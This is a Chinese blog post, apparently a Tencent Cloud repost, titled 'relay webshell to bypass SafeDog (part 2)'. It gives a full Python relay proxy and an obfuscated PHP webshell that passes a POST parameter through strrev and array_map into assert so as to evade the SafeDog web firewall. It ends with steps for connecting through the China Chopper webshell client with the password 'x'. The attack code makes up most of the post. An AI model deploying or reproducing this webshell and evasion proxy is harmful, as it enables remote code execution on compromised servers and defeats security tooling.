专栏首页洛米唯熊中转Webshell 绕过安全狗(二)

中转Webshell 绕过安全狗(二)

前言

在实践中转webshell绕过安全狗(一)中,在服务端和客户端均为php。某大佬提示并分享资源后,打算使用python完成中转。部分代码无耻copy。

客户端

本地127.0.0.1,安装python2 phpshellproxy.py

#coding=utf-8

import sys
reload(sys)
sys.setdefaultencoding('utf-8')

import web

urls = (
    '/','index',
    '/reverse','reverse',
    )

#render = web.template.render('templates/')
import json
import urllib

class index:
    def GET(self):
        return 1
class Base:
    def getpostdata(self, postdata):
        #content with &
        postdatalist = postdata.split('&')
        for pa in postdatalist:
            #content with =, can't split with =
            index = pa.find("=")
            setattr(self,pa[:index],urllib.unquote_plus(pa[index+1:]))
import requests
import codecs, urllib , base64 #, chardet
class reverse(Base, object):
    def GET(self,corpid):
        return 1
    def POST(self):
        data = web.data()
        #print data
        pwdata = data.split('&')[0].split('=')[1]
        #print pwdata
        #print 'pwdata', pwdata
        #print 'pwdata[::-1]', urllib.unquote(urllib.unquote(pwdata.replace('+',' '))[::-1]).replace('&','%26').replace('+','%2b')
        newpostdata = data.replace(pwdata, urllib.unquote(urllib.unquote(pwdata.replace('+',' '))[::-1]).replace('&','%26').replace('+','%2b'))
        #print 'newpostdata', newpostdata
        r = requests.post("http://192.168.253.129/waf/transServ.php", data=""+newpostdata.replace(' ','+'), headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36","Content-Type": "application/x-www-form-urlencoded"})#, proxies={'http':"http://127.0.0.1:8080"})
        #print r.apparent_encoding
        #r.encoding = 'gb2312'
        #print chardet.detect(r.content)
        #print r.text
        #return r.text
        return r.content 
if __name__ == "__main__":
    app = web.application(urls, globals())
    app.run()

运行需要安装

pip install web
pip install requests

服务端

shell端192.168.253.129,安装安全狗 reverse.php 做了点混淆,可过安全狗

<?php 
$DS = $_POST['x'];
$str = strrev($DS);
$a1 = array("1234","123456");
$a2 = array($str,"5461");
$ma = array_map(null,$a1,$a2)[0][1];
@assert($ma);

使用方法

  1. 替换phpshellproxy.py中的shell地址,需配合reverse.php使用
  2. 运行python phpshellproxy.py 9000 (端口自定义)
  3. 使用菜单连接对应shell地址,如 http://[ip]:9000/reverse ,输入对应密码,配置对应脚本类型,如果打开错误,建议清掉缓存,重新打开。

操作

本地运行phpshellproxy.py文件

中国菜刀进行连接http://127.0.0.1:9000/reverse 密码:x

本文分享自微信公众号 - 洛米唯熊(luomiweixiong)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-06-21

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 某shop API接口前台注入(通杀3.X)

    跟踪到/application/home/controller/Api.php控制器中的shop方法

    洛米唯熊
  • APT34攻击工具泄露

    近日,一位名为Lab Dookhtegan的用户在国外聊天软件Telegram公布了伊朗黑客组织APT34的相关信息,其中记录了118条不同国家网站的Websh...

    洛米唯熊
  • Hacking Team遭遇了大型数据攻击泄漏事件

    2015年7月5日,Hacking Team遭遇了大型数据攻击泄漏事件。 Hacking Team的官方推特被黑,官方主页面的banner更名为“Hacked...

    洛米唯熊
  • Google“羞辱”缓慢的网站

    它将首先考虑加载延迟的历史数据,再考虑用户的设备和网络状况,根据二者的情况发出页面加载缓慢的信号。

    shellmik
  • 三星想约运营商,是强势回归,还是回光返照?

    镁客网
  • 在idea中maven项目jdk编译version总是跳到1.5

    bug描述 项目ide: idea 项目构建工具:maven bug现象:每次修改pom之后,idea自动扫描一遍,然后发现默认的compile级别跳到5....

    Ryan-Miao
  • 万字长文深度解析Python装饰器

    Python 中的装饰器是你进入 Python 大门的一道坎,不管你跨不跨过去它都在那里。

    马哥linux运维
  • 火眼识英才,举荐得千金——2015腾讯T派移动互联网创新创业大赛伯乐计划

    移动互联网江湖风云际会,创业浪潮汹涌澎湃,总理关注万众瞩目,高校创业蔚然成风,大学校园卧虎藏龙。 现腾讯公司主办2015年T派移动互联网创新创业大赛,要么你亲自...

    腾讯高校合作
  • Django实战-信息资讯-订单视图

    Django网络应用开发的5项基础核心技术包括模型(Model)的设计,URL 的设计与配置,View(视图)的编写,Template(模板)的设计和Form(...

    小团子
  • Spring Cloud Zuul中路由配置细节

    上篇文章我们介绍了API网关的基本构建方式以及请求过滤,小伙伴们对Zuul的作用应该已经有了一个基本的认识,但是对于路由的配置我们只是做了一个简单的介绍,本文我...

    江南一点雨

扫码关注云+社区

领取腾讯云代金券